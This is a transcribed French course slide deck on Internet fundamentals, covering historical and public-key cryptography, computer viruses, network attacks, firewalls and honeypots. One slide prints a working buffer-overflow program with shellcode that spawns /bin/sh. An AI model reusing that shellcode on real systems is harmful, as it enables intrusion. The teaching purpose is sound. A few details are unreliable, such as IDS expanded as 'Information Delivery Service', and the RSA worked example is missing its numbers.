La présentation est en train de télécharger. S'il vous plaît, attendez

La présentation est en train de télécharger. S'il vous plaît, attendez

Fondamentaux de l'Internet (FDI)

Présentations similaires


Présentation au sujet: "Fondamentaux de l'Internet (FDI)"— Transcription de la présentation:

1 Fondamentaux de l'Internet (FDI)
JeanDo Lénard

2 Thèmes abordés d'ici fin Février (7 séances)
Cryptographie Une vielle histoire, quelques codes historiques La cryptographie moderne, principes et utilisations Mise en pratique de techniques, signatures, SSH ... Sécurité Linux Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

3 Thèmes abordés d'ici fin Février (7 séances)
Cryptographie Sécurité Virologie, Les attaques, Se protéger. Linux Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

4 Thèmes abordés d'ici fin Février (7 séances)
Cryptographie Sécurité Linux Qu'est-ce que c'est, pourquoi s'en servir ? Principales distributions Principaux logiciels Utilisation de base, interface graphique, ligne de commande Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

5 Thèmes abordés d'ici fin Février (7 séances)
Cryptographie Sécurité Linux Apache et sa configuration Pourquoi Apache ? Installation Configuration et sécurisation Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

6 Thèmes abordés d'ici fin Février (7 séances)
Cryptographie Sécurité Linux Apache et sa configuration Standard et W3C, les navigateurs ... Les standards sur Internet Légitimité du W3C Respect et tests par rapport aux standards Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

7 Thèmes abordés d'ici fin Février (7 séances)
Cryptographie Sécurité Linux Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS CVS, à quoi ça sert ? Comment travailler avec CVS, seul ou à plusieurs ? Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM...

8 Thèmes abordés d'ici fin Février (7 séances)
Cryptographie Sécurité Linux Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Grid Computing Peer to Peer... Logiciels libres, licences, brevets, DRM...

9 Thèmes abordés d'ici fin Février (7 séances)
Cryptographie Sécurité Linux Apache et sa configuration Standard et W3C, les navigateurs ... Le développement avec CVS Technologies collaboratives et décentralisées Logiciels libres, licences, brevets, DRM... Pourquoi des logiciels libres ? Les formes de licences Les brevets logiciels

10 Cryptographie Aperçu historique Les codes anciens Les codes militaires
Exemple pratique de déchiffrage Méthodes modernes de chiffrement Méthodes à clé secrète Méthodes à clé publique RSA PGP Signature électronique Certificat électronique

11 Cryptographie La crypto, une très vieille histoire avec ...
un empereur romain, des historiens grecs et des nihilistes russes Sherlock Holmes, et beaucoup d'autres

12 Cryptographie La crypto, une très vieille histoire avec ...
un empereur romain : Le code de César Le code le plus connu : substituer les lettres en les décalant

13 Cryptographie A B C D E F G H I J K L M N O P Q R S T U V W X Y Z
La crypto, une très vieille histoire avec ... un empereur romain : Le code de César Le code de César sur Internet : Le ROT-13 A B C D E F G H I J K L M N O P Q R S T U V W X Y Z deviennent N O P Q R S T U V W X Y Z A B C D E F G H I J K L M

14 Cryptographie 1 2 3 4 5 1 A B C D E 2 F G H I,J K 3 L M N O P
La crypto, une très vieille histoire avec ... un empereur romain, des historiens grecs et des nihilistes russes 1 A B C D E d 2 F G H I,J K 3 L M N O P 4 Q R S T U 5 V W X Y Z

15 Toute la Gaule est occupée !
Cryptographie La crypto, une très vieille histoire avec ... un empereur romain, des historiens grecs et des nihilistes russes Toute la Gaule est occupée ! devient

16 Toute la Gaule est occupée !
Cryptographie La crypto, une très vieille histoire avec ... un empereur romain, des historiens grecs et des nihilistes russes Toute la Gaule est occupée ! devient !

17 Cryptographie La crypto, une très vieille histoire avec ...
un empereur romain, des historiens grecs et des nihilistes russes et Sherlock Holmes (les hommes dansants)

18 Cryptographie Le chiffre ADFGVX en 1918 A D F G V X A Q Y A L S E
La crypto, une histoire plus récente avec ... des militaires... Le chiffre ADFGVX en 1918 A D F G V X A Q Y A L S E D Z C R X H 0 F F O 4 M 8 7 G 3 I T G U K V P D 6 2 N V X 1 5 J 9 W B

19 Toute la Gaule est occupée !
Cryptographie Toute la Gaule est occupée ! Devient GFFDGVGFAX AGAF GGAFGVAGAX AXAVGF FDDDDDGVVAAXAX ! On choisit une clé (OBELIX) et on reconstruit un tableau O B E L I X G F F D G V G F A X A G A F G G A F G V A G A X A X A V G F F D D D D D G V V A A X A X

20 FFGFG VFAAX GGFGA GAFVA AGGXX AGVAF DDDDF DVVAA GXXA
Cryptographie On classe les colonnes par ordre alphabétique B E I L O X F F G D G V F A A X G G F G A G A F V A A G G X X A G V A F D D D D F D V V A A G X X A On réécrit le message FFGFG VFAAX GGFGA GAFVA AGGXX AGVAF DDDDF DVVAA GXXA

21 Cryptographie Déchiffrer le message suivant dont la clé est OBELIX
gaaxavdddfgfxvgdavdggfddxaagxxvgagafvafggddavg

22 Cryptographie Déchiffrer le message suivant dont la clé est OBELIX
gaaxavdddfgfxvgdavdggfddxaagxxvgagafvafggddavg Reconstruire le premier tableau B E I L O X G A A X A V D D D F G F X V G D A V D G G F D D X A A G X X V G A G A F V A F G G D D A V G

23 Cryptographie Déchiffrer le message suivant dont la clé est OBELIX
gaaxavdddfgfxvgdavdggfddxaagxxvgagafvafggddavg Remettre le tableau dans l'ordre O B E L I X A G A X A V G D D F D F A X V D G V D D G F G D X X A G A X A V G G A F G V A G F D G D A V

24 Cryptographie Déchiffrer le message suivant dont la clé est OBELIX
Comparer les deux tableaux O B E L I X A G A X A V G D D F D F A X V D G V D D G F G D X X A G A X A V G G A F G V A G F D G D A V A D F G V X A Q Y A L S E D Z C R X H 0 F F O 4 M 8 7 G 3 I T G U K V P D 6 2 N V X 1 5 J 9 W B AG = L ; AX = E ; AV = S

25 Cryptographie Déchiffrer le message suivant dont la clé est OBELIX
gaaxavdddfgfxvgdavdggfddxaagxxvgagafvafggddavg devient Les irréductibles gaulois

26 Ces systèmes de chiffrement ne sont pas fiables.
Cryptographie Ces systèmes de chiffrement ne sont pas fiables. Pourquoi ?

27 Cryptographie Ces systèmes de chiffrement ne sont pas fiables.
Il y a que 26 systèmes possibles. C'est beaucoup à la main mais peu pour des ordinateurs. On peut utiliser une approche statistique.

28 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé secrète Le téléphone rouge et les diplômates L'algorithme DES et le TDES

29 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé secrète Le téléphone rouge et les diplômates L'algorithme DES et le TDES Ces méthodes, si elles peuvent être sûres, ne sont pas utilisables pour les civils. Pourquoi ?

30 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé secrète Le téléphone rouge et les diplômates L'algorithme DES et le TDES Ces méthodes, si elles peuvent être sûres, ne sont pas utilisables pour les civils. Pourquoi ? Les civils ne disposent pas de canaux sûrs pour échanger leurs clés.

31 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé publique

32 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé publique Le principe de Whitfield Diffie et Martin Hellman (1976). On dispose de 2 clés : une clé sert à chiffrer, une clé sert à déchiffrer.

33 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé publique Le principe de Whitfield Diffie et Martin Hellman (1976). On dispose de 2 clés : une clé sert à chiffrer (dite clé publique), une clé sert à déchiffrer (dite clé secrète). Le destinataire fournit la clé pour chiffrer. L'émetteur chiffre avec cette clé. Le destinataire déchiffre avec l'autre clé qu'il conserve.

34 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé publique Envoi de la clé publique Emetteur Destinataire

35 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé publique Envoi de la clé publique Emetteur Destinataire Emetteur chiffre le message avec la clé publique

36 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé publique Envoi de la clé publique Emetteur Destinataire Emetteur chiffre le message avec la clé publique Envoi du message chiffré Emetteur Destinataire

37 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé publique Envoi de la clé publique Emetteur Destinataire Emetteur chiffre le message avec la clé publique Envoi du message chiffré Emetteur Destinataire Destinataire déchiffre avec la clé secrète Emetteur

38 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé publique Reste à trouver comment créer des clés publiques et des clés secrètes !

39 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé publique Reste à trouver comment créer des clés publiques et des clés secrètes ! L'algorithme RSA (Rivest Shamir, Adleman), 1977.

40 Cryptographie Méthodes modernes de chiffrement
Les chiffrements à clé publique L'algorithme PGP (Pretty Good Privacy) de Zimmermann, 1991 Compression du message Génération d'une clé de session aléatoire Chiffrement du message avec la clé de session (algo symétrique rapide) Chiffrement de la clé de session avec la clé publique (avec RSA) Envoi du message chiffré et de la clé de session chiffrée Déchiffrement de la clé de session avec la clé secrète (lent) Déchiffrement du message avec la clé de session. (rapide)

41 Cryptographie Etre sûr de l'expéditeur : La signature électronique
Comme tous les messages, les messages électroniques peuvent être signés. Le principe est de créer une signature infalsifiable, mais que mon destinataire pourra reconnaître. Comment ?

42 Cryptographie Etre sûr de l'expéditeur : La signature électronique
Comment ? L'Emetteur chiffre son message M avec sa clé secrète : SE(M) Le message est dit signé. L'Emetteur chiffre le message avec la clé publique du Destinataire : PD(SE(M)) Le message est signé et chiffré. Le Destinataire déchiffre le message avec sa clé privé : SD(PD(SE(M)))=SE(M) Le Destinataire déchiffre le message signé avec la clé publique de l'émetteur : PE(SD(PD(SE(M))))=PE(SE(M))=M

43 Cryptographie Etre sûr de l'expéditeur : La signature électronique
PE(SD(PD(SE(M))))=PE(SE(M))=M Le message n'a pu être lu que par Destinataire car lui-seul a pu utiliser : SD Donc le message provient bien de Emetteur car lui-seul a pu utiliser SE Donc la signature change à chaque message !

44 Cryptographie Etre sûr du destinataire : Le certificat électronique
Le destinataire doit fournir son identité, le certificat. L'objectif est de prouver que la clé publique est bien celle du destinataire. Création du certificat : Le destinataire envoie sa clé publique à un organisme de certification Le destinataire envoie d'autres informations pour valider la clé Après validation, l'organisme calcule un résumé du certificat L'organisme signe ce résumé avec sa clé secrète L'émetteur déchiffre le résumé avec la clé publique de l'organisme Si le résumé déchiffré est correct, le certificat est bon. Donc la clé publique est bonne On est sûr de l'émetteur

45 Cryptographie Un exemple
Allons-y ! Commençons par créer notre paire de clés: Prenons 2 nombres premiers au hasard: p = 29, q = 37 On calcul n = pq = 29 * 37 = 1073 On doit choisir e au hasard tel que e n'ai aucun facteur en commun avec (p-1)(q-1): (p-1)(q-1) = (29-1)(37-1) = 1008 On prend e = 71 On choisit d tel que 71*d mod 1008 = 1 On trouve d = 1079 On a maintenant nos clés : La clé publique est (e,n) = (71,1073)   (=clé d'encryptage) La clé privée est (d,n) = (1079,1073)   (=clé de décryptage) On va encrypter le message 'HELLO'. On va prendre le code ASCII de chaque caractère et on les met bout à bout: m = Ensuite, il faut découper le message en blocs qui comportent moins de chiffres que n. n comporte 4 chiffres, on va donc découper notre message en blocs de 3 chiffres: (on complète avec des zéros) Ensuite on encrypte chacun de ces blocs: 726^71 mod 1073 = ^71 mod 1073 = ^71 mod 1073 = ^71 mod 1073 = 552 Le message encrypté est On peut le décrypter avec d: 436^1079 mod 1073 = ^1079 mod 1073 = ^1079 mod 1073 = ^1079 mod 1073 = 900 C'est à dire la suite de chiffre On retrouve notre message en clair : 'HELLO'.

46 Virus et virologie Un virus est « un programme qui peut contaminer un autre progr amme en le modifiant pour inclure une partie de lui-même ». Un ver est un virus qui se propage via le réseau (carnet d’adresses ou autres). Il ne se reproduit pas sur les autres fichiers de la machine. Un cheval de Troie est un programme attaché à un autre (le porteur) qui s’exécute quand on lance le porteur. Le plus connu est le Backdoor. Un macro-virus infecte les fichiers des logiciels qui ont un langage de macros (Word, Excel, etc...).

47 Virus, principes de fontionnement

48 Virus, principes de fontionnement
Exécution d’un programme infecté

49 Virus, principes de fontionnement
Exécution d’un programme infecté Chargement du virus en mémoire

50 Virus, principes de fontionnement
Exécution d’un programme infecté Chargement du virus en mémoire Le virus attend le lancement de nouveaux programmes

51 Virus, principes de fontionnement
Exécution d’un programme infecté Chargement du virus en mémoire Le virus attend le lancement de nouveaux programmes Interception lors du lancement d’un programme

52 Virus, principes de fontionnement
Exécution d’un programme infecté Chargement du virus en mémoire Le virus attend le lancement de nouveaux programmes Interception lors du lancement d’un programme Modification du programme

53 Virus, principes de fontionnement
Exécution d’un programme infecté Chargement du virus en mémoire Le virus attend le lancement de nouveaux programmes Interception lors du lancement d’un programme Modification du programme Lancement du programme normal

54 Virus, principes de fontionnement
4 fonctions essentielles

55 Virus, principes de fontionnement
4 fonctions essentielles Fonction de recherche : décider quels fichiers infecter et à quel vitesse - Ne pas déclencher des reproductions trop fréquentes - Se reproduire suffisamment pour être efficace

56 Virus, principes de fontionnement
4 fonctions essentielles Fonction de recherche : décider quels fichiers infecter et à quel vitesse - Ne pas déclencher des reproductions trop fréquentes - Se reproduire suffisamment pour être efficace Fonction de reproduction : Modification du programme cible - Insertion du code du virus dans la cible - Insertion de l’appel en début de programme

57 Virus, principes de fontionnement
4 fonctions essentielles Fonction de recherche : décider quels fichiers infecter et à quel vitesse - Ne pas déclencher des reproductions trop fréquentes - Se reproduire suffisamment pour être efficace Fonction de reproduction : Modification du programme cible - Insertion du code du virus dans la cible - Insertion de l’appel en début de programme Fonction de destruction : variées - routine d’activation - actions : ralentissement, messages, destructions...

58 Virus, principes de fontionnement
4 fonctions essentielles Fonction de recherche : décider quels fichiers infecter et à quel vitesse - Ne pas déclencher des reproductions trop fréquentes - Se reproduire suffisamment pour être efficace Fonction de reproduction : Modification du programme cible - Insertion du code du virus dans la cible - Insertion de l’appel en début de programme Fonction de destruction : variées - routine d’activation - actions : ralentissement, messages, destructions... Fonction de cryptage : rendre le virus indétectable.... - Intégration dans le virus de routine de cryptage de son code - Le second fichier infecté aura une signature différente

59 Macro-virus Enfin, l’écriture de virus à la portée de tous !
Des logiciels à langage de macros comme Word ou Excel exécute automatiquement des macros lors de leur exécution (AutoOpen, AutoExec, AutoNew, AutoClose, AutoExit). Un fichier Word infecté va modifier ces macros automatiques et les copier dans le modèle global.dot pour infecter pour les fichiers Word. Facile à écrire gràce au Visual Basic. Ils sont à la mode. Difficile à éradiquer car un document infecté peut être sur un disque dur, dans une boîte mail, dans une base de données, etc...

60 Protection contre les virus
Pas de recette miracle, un minimum de bon sens Avoir un anti-virus à jour. Se méfier des pièces jointes dans les mails, voire n’ouvrir une pièce jointe que si l’émetteur du mail (connu) y fait référence dans le corps du message. Activer la visualisation des extensions de fichiers (double extension). Faire des sauvegardes. Utiliser un Firewall pour se protéger des cheveaux de Troie. Ne pas redistribuer les Hoaxes.

61 Sécurité informatique
Pourquoi les systèmes sont-ils vulnérables ? La sécurité coûte chère et les avantages ne sont pas visibles. Les sociétés acceptent de courrir le risque. La politique de sécurité est complexe et basée sur des jugements humains. Les technologies ont toutes des failles. Les utilisateurs ne sont pas conscients des enjeux.

62 Sécurité informatique
Les méthodes d’attaque courantes IP Spoofing : parodier une adresse IP connue pour entrer sur le réseau lorsque l’identification est fondée sur l’adresse IP

63 Sécurité informatique
Les méthodes d’attaque courantes IP Spoofing : parodier une adresse IP connue pour entrer sur le réseau lorsque l’identification est fondée sur l’adresse IP Déni de service (DOS) : Empêcher l’utilisation d’une machine (serveur Web ou de messagerie. Plus facile à mettre en oeuvre. - Localement (en remplissant le disque, nombre de process infini, etc.). - Par le réseau : SYN flood, Flags TCP illégaux, etc.

64 Sécurité informatique
Les méthodes d’attaque courantes DOS par SYN flood : L’attaquant envoie un grand nombre de requètes SYN (demande de connexions). La machine cible doit gérer ce grand nombre dans une liste (SYN_RECV). La machine cible ne fait plus que ça. Parades : L’attaque est visible (netstat –an) indique un grand nombre de ocnnexions en SYN-RECV. Les OS modernes sont protégés. Utiliser un IDS (Information Delivery Service) qui envoie des Resets si trop de SYN.

65 Sécurité informatique
Les méthodes d’attaque courantes Le DDOS (Distributed Denial of Service) : - Très à la mode - Objectif : écrouler la machine cible - L’attaquant utilise plusieurs machines qu’il a piratées (des PC de particuliers connectés sur Internet) Les grands débuts en Février 2000, où Mafiaboy (15 ans) fait tomber les sites de Microsoft, ebay, Amazon, cnn, etc...). Le principe est que plusieurs machines (quelques milliers) émettent toutes des demandes de connexions au serveur. Celui-ci n’est plus occupée qu’à gérer la liste. Plus sur Intérêts : Le véritable attaquant est caché. On ne peut pas filtrer une adresse d’attaquant.

66 Sécurité informatique
Quantité d’autres méthodes DOS sur les DNS : L’objectif est que la réponse du DNS renvoie l’IP de la machine du pirate pour que l’utilisateur vienne se connecter chez le pirate (de plus en plus difficile à mettre en oeuvre, dernier exploit en 2004 qui a pu faire tomber Microsoft, Google, Yahoo, Apple, Xerox et d’autres). Attaque en SMURF : Prendre l’adresse de la victime et envoyer une trame de type request sur une adresse de diffusion. Toutes les machines actives de la plage d’adresse vont répondre à la machine à attaquer.

67 Sécurité informatique
Quantité d’autres méthodes Les attaques sur la pile IP : Le principe est d’envoyer des paquets IP mal formattés pour planter la pile IP du serveur. Le plus connu est le « ping of death » qui est (était) capable de faire rebooter les machines. (

68 Sécurité informatique
Crackage de mots de passe et rootkits Il existe de très bons outils de crackage de mots de passe : - l0phtcrack pour Windows - John the Ripper pour Unix et Wondows ( Cracker un mot de passe permet ensuite d’installer un Rootkit (la Rolls-Royce du crack) Le rootkit contient en général : - un sniffer pour repérer d’autres machines sur le réseau. - des programmes avec des backdoors pour rentrer sur le système même si le premier accès est fermé. - des remplaçants des commandes courantes. - un outil de nettoyage des logs pour effacer les traces. Il existe des outils de détection (chkrootkit pour Unix, rootkitrevealer Win)

69 Sécurité informatique
Les vulnérabilités applicatives Beaucoup d’applications sont vulnérables pour cause de mauvaise programmation ou de manière volontaire. - Buffer overflow (très courant en C), problèmes de format, entrée utilisateur non contrôlée - Backdoor « oubliées » Beaucoup d’applications ont besoin de sécurité, soit parce qu’elles contiennent des données sensibles (BDD), soit parce qu’elles constituent des points d’entrée (script cgi, etc.).

70 char shellcode[] = "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh"; char large_string [128] ; void main () { char buffer [96] ; int i ; long *long_ptr = (long *) large_string ; for (i = 0 ; i < 32 ; i++) *(long_ptr + i) = (int) buffer ; for (i = 0 ; i < strlen (shellcode) ; i++) large_string [i] = shellcode [i] ; strcpy (buffer,large_string) ; }

71 Sécurité informatique
Base de la protection : l’analyse L’outil Nessus ( est un scanner de serveur qui permet de tester la sécurité d’une machine. Nessus génère des rapports d’analyse de la machine concernée. Nessus dispose de base de données de vulnérabilités à jour. Attention, ces outils peuvent être utilisés aussi par les attaquants ! Il existe donc des outils qui détectent l’utilisation des outils de type Nessus. Ce sont des IDS (Intrusion Dectection Software) comme Snort (

72 Sécurité informatique
Rapport de résultats de Nessus

73 Sécurité informatique
Notions de Firewalling Un Firewall est un serveur qui a pour objectif : - Protéger le réseau du monde extérieur - Maintenir les utilisateurs à l’intérieur - Restreindre le nombre de machines à surveiller - Protéger les machines qui doivent communiquer avec l’extérieur Il ne protège pas : - contre les attaques venues de l’intérieur - les mots de passe faciles à craquer Deux politiques possibles - Tout interdire, puis autoriser au cas par cas - Tout autoriser, puis interdire au cas par cas

74 Sécurité informatique
Notions de Firewalling Un Firewall contrôle les accès entrants et sortants : - par service : quelles applications demandent un accès - par adresse IP Un Firewall peut filtrer les accès : - sur les paquets : un ordinateur demande un accès au serveur Web sur le port 80, je le laisse passer un ordinateur demande un accès au serveur Web sur le port 25, je l’interdit. - en servant de passerelle : un ordinateur demande un accès au serveur Web sur le port 80, je le laisse passer en le traduisant en accès sur le port 3012. - par application : Relais de messagerie, http, etc.

75 Sécurité informatique
Notions de Firewalling Tout le trafic réseau depuis Internet vers le serveurs visibles (DMZ) passe par le Firewall, comme du LAN vers la DMZ ou du LAN vers Internet. On peut multiplier les Firewalls pour créer des zones étanches.

76 Sécurité informatique
Notions de Firewalling checkpoint : mnf : Le firewall personnel de XP (correct pour un poste de travail simple)

77 Sécurité informatique
Le pot de miel « Honeypot » Le pot de miel (machine faible) a pour objectif d’attirer les mouches (les crackers). On pose sur le réseau (visible depuis Internet ou non) un machine faiblement sécurisée pour distraire le cracker des machines plus sensibles. On étudie ses techniques d’attaque pour protéger les autres machines. On apprend des informations sur lui. On lance la contre-attaque ! Exemple :

78 Sécurité informatique
Le pot de miel « Honeypot » Typiquement, un pot de miel est un machine sur laquelle tourne plusieurs systèmes d’exploitation virtuel différents (vmware ou autre). Donc cette machine donne l’impression d’être plusieurs machines Windows simples (serveurs ou PC) ou bien des machines Linux, etc. Un autre serveur apparement sans intérêt surveille le honeypot et collecte des informations sur ceux qui se connecte sur le honeypot. Si un attaquant casse un des machines virtuelles, cela n’a pas d’importance, mais l’attaquant est alors repéré.

79 Sécurité informatique
En administration Limité les accès physiques aux machines Concvoir le réseau avec un « regard sécurité » Fermer les services inutiles ainsi que les comptes utilisateurs inutilisés S’abonner aux listes de diffusion sécurité pour le système et les applications Passer les patches Crypter les informations circulants

80 Sécurité informatique
En cas d’intrusion Débrancher la machine ou non ? Sauvegarder la machine pour l’analyser à froid Reformater le tout et réinstaller une sauvegarde saine Modifier les mots de passe et les clefs de cryptage Ne pas donner d’informations sur ce qui s’est passé Surveiller car l’attaquant reviendra probablement (puisqu’il sait comment entrer.

81 Sécurité informatique
En conclusion Le seul système informatique qui est vraiment sûr est un système éteint et débranché, enfermé dans un blockhaus sous terre, entouré par des gaz mortels et des gardiens hautement payés et armés. Même dans ces conditions, je ne parierais pas ma vie dessus. (c) Gene Spafford, fondateur du Computer Operations, Audit and Security Technology Laboratory


Télécharger ppt "Fondamentaux de l'Internet (FDI)"

Présentations similaires


Annonces Google